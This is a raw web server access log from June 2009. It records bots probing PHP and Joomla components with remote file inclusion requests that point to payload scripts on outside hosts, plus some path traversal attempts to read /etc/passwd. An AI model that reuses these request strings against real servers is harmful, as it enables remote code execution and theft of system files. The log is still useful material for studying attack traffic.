70.38.31.50 - - [26/Jun/2009:00:40:25 -0500] "GET /logs/access_log.1242000000//components/com_facileforms/facileforms.frame.php?ff_compath=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
66.249.68.42 - - [26/Jun/2009:00:40:42 -0500] "GET / HTTP/1.1" 200 3245 "-""DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
66.11.230.36 - - [26/Jun/2009:00:40:46 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:00:40:46 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:00:40:46 -0500] "GET /logs/access_log.1239926400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:00:41:04 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:00:41:04 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:00:41:04 -0500] "GET /logs/access_log.1239926400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
218.30.100.97 - - [26/Jun/2009:00:44:27 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.30.100.97 - - [26/Jun/2009:00:44:27 -0500] "GET /logs/access_log.1240444800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
218.30.100.97 - - [26/Jun/2009:00:44:27 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.30.100.97 - - [26/Jun/2009:00:44:27 -0500] "GET /logs/access_log.1240531200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
201.232.54.48 - - [26/Jun/2009:00:51:28 -0500] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
201.232.54.48 - - [26/Jun/2009:00:51:32 -0500] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 200 194790 "-""libwww-perl/5.805"
123.143.98.5 - - [26/Jun/2009:00:54:47 -0500] "GET /logs//newspublish/include.php?path[docroot]=http://saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:00:54:47 -0500] "GET //newspublish/include.php?path[docroot]=http://saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:00:54:47 -0500] "GET /logs/access_log.1236124800//newspublish/include.php?path[docroot]=http://saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:00:54:51 -0500] "GET /logs//newspublish/include.php?path[docroot]=http://saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:00:54:51 -0500] "GET /logs/access_log.1232668800//newspublish/include.php?path[docroot]=http://saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:00:54:51 -0500] "GET //newspublish/include.php?path[docroot]=http://saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:00:54:51 -0500] "GET /logs/access_log.1232668800//newspublish/include.php?path[docroot]=http://saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:00:54:58 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:00:54:58 -0500] "GET /logs/access_log.1239408000/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:00:54:58 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:00:55:07 -0500] "GET /logs/access_log.1240444800/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:00:55:54 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:00:55:54 -0500] "GET /logs/access_log.1239408000/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:00:55:54 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:00:55:59 -0500] "GET /logs/access_log.1240444800/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:00:56:42 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:00:56:42 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:00:56:42 -0500] "GET /logs/access_log.1239408000/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:00:57:08 -0500] "GET /logs/access_log.1240444800/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:00:57:16 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:00:57:16 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:00:57:16 -0500] "GET /logs/access_log.1239408000/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:00:57:21 -0500] "GET /logs/access_log.1240444800/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
201.232.54.48 - - [26/Jun/2009:00:57:56 -0500] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
201.232.54.48 - - [26/Jun/2009:00:58:01 -0500] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 200 194790 "-""libwww-perl/5.805"
157.158.35.39 - - [26/Jun/2009:00:58:41 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
157.158.35.39 - - [26/Jun/2009:00:58:41 -0500] "GET /logs/access_log.1240531200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
157.158.35.39 - - [26/Jun/2009:00:58:41 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:01:00:46 -0500] "GET //components/errors.php?error=http://saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:01:00:46 -0500] "GET /logs/access_log.1238025600//components/errors.php?error=http://saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:01:00:46 -0500] "GET /logs//components/errors.php?error=http://saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:01:00:47 -0500] "GET /logs/access_log.1240444800//components/errors.php?error=http://saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:01:01:03 -0500] "GET //components/errors.php?error=http://saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:01:01:03 -0500] "GET /logs/access_log.1240444800//components/errors.php?error=http://saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:01:01:03 -0500] "GET /logs//components/errors.php?error=http://saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
123.143.98.5 - - [26/Jun/2009:01:01:03 -0500] "GET /logs/access_log.1238025600//components/errors.php?error=http://saengcho.hs.kr//bbs/include/etel.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
65.55.230.168 - - [26/Jun/2009:01:05:36 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.230.168 - - [26/Jun/2009:01:05:36 -0500] "GET /logs/access_log.1107993600 HTTP/1.1" 200 998 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.230.168 - - [26/Jun/2009:01:12:13 -0500] "GET /logs/access_log.1223337600 HTTP/1.1" 200 9107 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
66.11.230.36 - - [26/Jun/2009:01:13:22 -0500] "GET /logs/access_log.1238112000/localhost/path/infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 382 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:01:13:22 -0500] "GET /localhost/path/infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:01:13:22 -0500] "GET /logs/localhost/path/infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:01:14:20 -0500] "GET /localhost/path/infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:01:14:20 -0500] "GET /logs/localhost/path/infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:01:14:20 -0500] "GET /logs/access_log.1238112000/localhost/path/infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=http://lineage2.stratics.com/staff/id.txt??? HTTP/1.1" 404 382 "-""Mozilla/5.0"
211.206.120.187 - - [26/Jun/2009:01:17:49 -0500] "GET //include/bbs.lib.inc.php?site_path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
211.206.120.187 - - [26/Jun/2009:01:17:49 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.206.120.187 - - [26/Jun/2009:01:17:49 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
211.206.120.187 - - [26/Jun/2009:01:17:49 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
201.232.54.48 - - [26/Jun/2009:01:19:33 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 308 "-""libwww-perl/5.805"
201.232.54.48 - - [26/Jun/2009:01:19:33 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-""libwww-perl/5.805"
201.232.54.48 - - [26/Jun/2009:01:19:33 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 335 "-""libwww-perl/5.805"
201.232.54.48 - - [26/Jun/2009:01:19:51 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 335 "-""libwww-perl/5.805"
201.232.54.48 - - [26/Jun/2009:01:19:51 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 308 "-""libwww-perl/5.805"
201.232.54.48 - - [26/Jun/2009:01:19:51 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-""libwww-perl/5.805"
93.174.137.184 - - [26/Jun/2009:01:26:03 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.poelkingbowling.com/help/log/idxx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
93.174.137.184 - - [26/Jun/2009:01:26:03 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.poelkingbowling.com/help/log/idxx.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
93.174.137.184 - - [26/Jun/2009:01:26:03 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://www.poelkingbowling.com/help/log/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
93.174.137.184 - - [26/Jun/2009:01:26:09 -0500] "GET /logs/access_log.1233792000//modules/xfsection/modify.php?dir_module=http://www.poelkingbowling.com/help/log/idxx.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
210.66.69.168 - - [26/Jun/2009:01:27:43 -0500] "GET /logs/access_log.1229990400 HTTP/1.0" 200 112089 "-""Gaisbot/3.0+(robot06@gais.cs.ccu.edu.tw;+http://gais.cs.ccu.edu.tw/robot.php)"
210.66.69.183 - - [26/Jun/2009:01:28:22 -0500] "GET /logs/access_log.1236556800 HTTP/1.0" 200 197686 "-""Gaisbot/3.0+(robot06@gais.cs.ccu.edu.tw;+http://gais.cs.ccu.edu.tw/robot.php)"
93.174.137.184 - - [26/Jun/2009:01:28:39 -0500] "GET //modules/xfsection/modify.php?dir_module=http://kuettner.it/baner.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
93.174.137.184 - - [26/Jun/2009:01:28:39 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://kuettner.it/baner.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
93.174.137.184 - - [26/Jun/2009:01:28:40 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://kuettner.it/baner.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
93.174.137.184 - - [26/Jun/2009:01:28:45 -0500] "GET /logs/access_log.1233792000//modules/xfsection/modify.php?dir_module=http://kuettner.it/baner.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
93.174.137.184 - - [26/Jun/2009:01:29:59 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
93.174.137.184 - - [26/Jun/2009:01:29:59 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
93.174.137.184 - - [26/Jun/2009:01:29:59 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
93.174.137.184 - - [26/Jun/2009:01:30:07 -0500] "GET /logs/access_log.1233792000//modules/xfsection/modify.php?dir_module=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
201.232.54.48 - - [26/Jun/2009:01:31:01 -0500] "GET /logs/access_log.1241222400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 335 "-""libwww-perl/5.805"
209.172.33.230 - - [26/Jun/2009:01:31:09 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
209.172.33.230 - - [26/Jun/2009:01:31:09 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
209.172.33.230 - - [26/Jun/2009:01:31:09 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
209.172.33.230 - - [26/Jun/2009:01:31:30 -0500] "GET /logs/access_log.1233792000//modules/xfsection/modify.php?dir_module=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
93.174.137.184 - - [26/Jun/2009:01:32:45 -0500] "GET //parse/parser.php?WN_BASEDIR=http://kuettner.it/yes.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.826"
93.174.137.184 - - [26/Jun/2009:01:32:45 -0500] "GET /logs//parse/parser.php?WN_BASEDIR=http://kuettner.it/yes.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.826"
209.172.33.230 - - [26/Jun/2009:01:33:52 -0500] "GET //parse/parser.php?WN_BASEDIR=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
209.172.33.230 - - [26/Jun/2009:01:33:52 -0500] "GET /logs/access_log.1237680000//parse/parser.php?WN_BASEDIR=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
209.172.33.230 - - [26/Jun/2009:01:33:57 -0500] "GET /logs//parse/parser.php?WN_BASEDIR=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
209.172.33.230 - - [26/Jun/2009:01:34:07 -0500] "GET /logs/access_log.1239321600//parse/parser.php?WN_BASEDIR=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
93.174.137.184 - - [26/Jun/2009:01:34:10 -0500] "GET /logs//parse/parser.php?WN_BASEDIR=http://kuettner.it/baner.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
93.174.137.184 - - [26/Jun/2009:01:34:10 -0500] "GET /logs/access_log.1237680000//parse/parser.php?WN_BASEDIR=http://kuettner.it/baner.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
93.174.137.184 - - [26/Jun/2009:01:34:11 -0500] "GET //parse/parser.php?WN_BASEDIR=http://kuettner.it/baner.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
93.174.137.184 - - [26/Jun/2009:01:34:11 -0500] "GET /logs/access_log.1239321600//parse/parser.php?WN_BASEDIR=http://kuettner.it/baner.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
93.174.137.184 - - [26/Jun/2009:01:34:26 -0500] "GET /logs/access_log.1237680000//parse/parser.php?WN_BASEDIR=http://www.poelkingbowling.com/help/log/idxx.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
93.174.137.184 - - [26/Jun/2009:01:34:26 -0500] "GET //parse/parser.php?WN_BASEDIR=http://www.poelkingbowling.com/help/log/idxx.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
93.174.137.184 - - [26/Jun/2009:01:34:26 -0500] "GET /logs//parse/parser.php?WN_BASEDIR=http://www.poelkingbowling.com/help/log/idxx.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
201.232.54.48 - - [26/Jun/2009:01:34:48 -0500] "GET /logs/access_log.1242000000//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 335 "-""libwww-perl/5.805"
93.174.137.184 - - [26/Jun/2009:01:34:53 -0500] "GET //parse/parser.php?WN_BASEDIR=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
93.174.137.184 - - [26/Jun/2009:01:34:53 -0500] "GET /logs//parse/parser.php?WN_BASEDIR=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
93.174.137.184 - - [26/Jun/2009:01:34:53 -0500] "GET /logs/access_log.1237680000//parse/parser.php?WN_BASEDIR=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
93.174.137.184 - - [26/Jun/2009:01:34:54 -0500] "GET /logs/access_log.1239321600//parse/parser.php?WN_BASEDIR=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
93.174.137.184 - - [26/Jun/2009:01:35:06 -0500] "GET /logs/access_log.1239321600//parse/parser.php?WN_BASEDIR=http://www.poelkingbowling.com/help/log/idxx.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
201.232.54.48 - - [26/Jun/2009:01:35:14 -0500] "GET /logs/access_log.1242000000//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 335 "-""libwww-perl/5.805"
201.232.54.48 - - [26/Jun/2009:01:36:51 -0500] "GET /logs/access_log.1241913600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 335 "-""libwww-perl/5.805"
201.232.54.48 - - [26/Jun/2009:01:40:34 -0500] "GET /logs/access_log.1241222400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 335 "-""libwww-perl/5.805"
66.249.68.42 - - [26/Jun/2009:01:41:13 -0500] "GET /logs/access_log.1127952000 HTTP/1.1" 200 778 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
201.232.54.48 - - [26/Jun/2009:01:41:44 -0500] "GET /logs/access_log.1241913600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 335 "-""libwww-perl/5.805"
65.55.106.156 - - [26/Jun/2009:01:44:24 -0500] "GET /logs/access_log.1214352000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.124 - - [26/Jun/2009:01:44:27 -0500] "GET /logs/access_log.1162425600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.30.100.97 - - [26/Jun/2009:01:46:53 -0500] "GET /logs/access_log.1240963200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
218.30.100.97 - - [26/Jun/2009:01:46:53 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.30.100.97 - - [26/Jun/2009:01:46:53 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
65.55.106.242 - - [26/Jun/2009:01:55:28 -0500] "GET /logs/access_log.1185667200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
